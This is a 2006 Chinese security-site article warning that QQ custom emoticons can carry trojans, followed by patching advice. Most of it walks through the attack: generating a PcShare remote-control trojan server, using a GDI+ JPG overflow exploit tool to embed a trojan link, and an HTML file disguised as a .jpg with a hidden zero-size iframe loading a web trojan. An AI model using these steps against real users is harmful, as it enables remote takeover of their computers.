通行证: 用户 密码 域名空间  下载中心 社区论坛 信息公告 my小屋
联系我们
设为首页
加入收藏

 

qq,asp,php,jsp,xml,sql,.net,编程 程序 网页图象 建站经验 私服
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿
论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图
专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版
社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 韩国素材 | 素材图库 | 广告服务 | 服务
当前位置:首页>>网络安全>>安全防范>>正文 新版上线![旧版]
注:打开慢时请稍等

提防qq表情背后隐藏的阴谋

http://www.iyit.net  日期:2006-6-6 8:58:39  来源:  点击:
参加讨论】编者按:相信qq是广大网友都非常熟悉的聊天工具了。有相当一部分朋友对于qq的自定义表情非常喜爱,甚至自己制作个性化的自定义表情共享给大家。但是在我们享受各种个性化表情的时候,黑客也通过这些表情图片悄悄地潜入我们的系统种植木马,让我们防不胜防。我们该如何应对,下面我们就一起来揭穿隐藏在qq自定义表情背后的阴谋。

  自定义表情的利用

  知道了这个原理后,下面我们就一步一步地来重复通过图片种植木马的操作。

  第1步:配置木马程序

  首先要配置一个木马的服务端程序,通过这个程序就可以进行远程计算机的控制。我这里是利用国产木马pcshare。

  运行pcshare.exe后,点击工具栏的“生成客户”按钮,在弹出的“生成被控制端执行程序”的窗口中进行设置(图1)。最后点击“生成”按钮,就能生成一个配置好的木马服务端程序了,接着将服务端程序上传到我申请好的网络空间中。

  第2步:生成图片木马

  要想通过自定义表情来进行木马的种植,有两种方法,它们分别是通过漏洞、html代码进行制作,下面就分别对这两种方法进行分析说明。
1.利用漏洞种植木马

  这种方法是通过windows系统以及应用程序的漏洞而产生的,比如2004年的“windows gdi+ jpg解析组件缓冲区溢出漏洞”、“windows图形渲染引擎安全漏洞”,2005年的“msn messenger png图片解析远程代码执行漏洞”,以及今年的“windows图形渲染引擎wmf格式代码执行漏洞”都是和图形图像有关的漏洞。

  下面就以“windows gdi+ jpg解析组件缓冲区溢出漏洞”为例,为大家讲解图片木马的生成过程。

  在命令提示符下激活漏洞利用工具jpglowder,查看工具的使用方法(如图2)。漏洞利用工具包含了多个命令参数。

  要利用这个漏洞生成图片木马,只要使用工具内置参数“d”即可,通过输入一段含有木马的网页链接,就可以生成需要的图片木马。

  2.利用html代码种植木马

  这种利用html代码制作的图片木马,其实就是传统的网页木马的一种变种而已。打开记事本程序输入如下代码,并将代码另存为plmm.jpg。
<html><body>
<iframe src="网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="真实的图片地址"></img></center>
</body></html>

  这里通过一个跳转命令连链到一个网页木马的地址。

  定点防范,找准关键

  其实,通过图片进行木马传播已经是个老技术了。但是现在黑客通过qq的自定义表情来主动种植木马还是要引起我们的高度重视。

  我们可以看到,图片木马和网页木马一样,要利用系统的漏洞才能被种植进系统,所以我们可以发现,方俊朋友在安装了各种杀毒软件和防火墙后,没有及时打上系统漏洞补丁,才让黑客有可乘之机。

  所以我们防范通过qq自定义表情来种植木马的关键就是及时为系统打上漏洞补丁(大家可以根据自己系统情况到http://www.microsoft.com下载相应补丁包),即使是不能在第一时间安装系统的安全补丁,也可以通过使用第三方提供的补丁进行防范。


编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部]
上一篇:网络安全内容过滤:国内国外大不同
下一篇:入侵惯用伎俩大曝光
转载请注明来源:www.iyit.net
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。

 相关文章
巧用acdsee 8.0截取qq表情每一帧 qq被盗 不用担心找不回好友 输入qq/tm消息时常用的快捷键
qq截屏新方法 qq空间代码制作教程大全 qq直播的新功能——群电视
珊瑚虫qq增强包4.5正式版发布 断线自动 与qq陌生人交谈的最简单方法 合理利用群技巧 让qq群聊更顺心
qq音速爱心金种子横空出世 qq空间新手图文教程 qq漏洞巧利用强迫他人为你买q秀
伪造qq挂机平台盗密码 用木马取得远程电脑上qq聊天纪录  封杀qq消息连发器病毒
flash制作一款漂亮别致的qq菜单 一波三折搞定qq木马病毒  qq珊瑚虫增强包v4.1最终测试版发布
教你如何填写有说服力的qq号码申诉资料 珊蝴虫qq探测隐身的招式用法 教你轻松搞定qq木马
随心所欲地引用您的qq秀形象 qq超实用技巧一则 免费用户也能加密网络 跟我学全手工精心优化qq设置
最新更新 热点排行 推荐新闻
杜绝木马的干扰 防范后门的技巧
灭毒有招 如何全面清除计算机病毒
流行电脑病毒rose.exe介绍与清除指南
病毒防范日常需注意的知识
感染并损坏c盘所有exe文件的病毒
oracle碎片整理(1)
oracle碎片整理(2)
oracle如何精确计算row的大小
oracle监控数据库性能的sql汇总
oracle logminer使用方法总结
某外企sql server面试题
同步两个sqlserver数据库
sql server:错误18483
sql2005其中三个版本的比较
远程连接sql server 2000服务器的解决
qq密码破解程序
小心摄像头成为黑客偷窥你的眼睛
如何对付wga检查
恢复sql server系统数据库
封杀qq消息连发器病毒
qq最新版下载 2006 beta2 体验新感受 
qq密码破解程序
windows xp专业版iis连接数的更改
qq密码本地破解
office2007简体中文版浮出水面 美图抢
visual basic 概述
解决暴风影音无法渲染此文件的难题
解决windows中的explorer.exe出错
exeplorer.exe错误的问题的总结、解决
一个好汉n个帮 word实用插件集锦
传统计算机病毒传播能力破坏性在提高
小心摄像头成为黑客偷窥你的眼睛
操作系统被入侵后的修复过程
巧用acdsee 8.0截取qq表情每一帧
解除瑞星 诺顿遗留下的杀毒兼容问题
第一款开源ajax安全扫描工具sprajax
winrar人性化功能揭密
在asp.net中防止注入攻击
用asp.net开发web服务的五则技巧
linux操作系统12则经典应用技巧
浅谈linux优化及安全配置的个人体会
解决局域网不能互相访问之全攻略
win 2000简单的入侵常识
 友情链接
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
copyrights © 2004-2006 iyit.net all rights reserved.
网站合作、广告联系qq:147007642、466949678
易特网络技术 点击这里给我发消息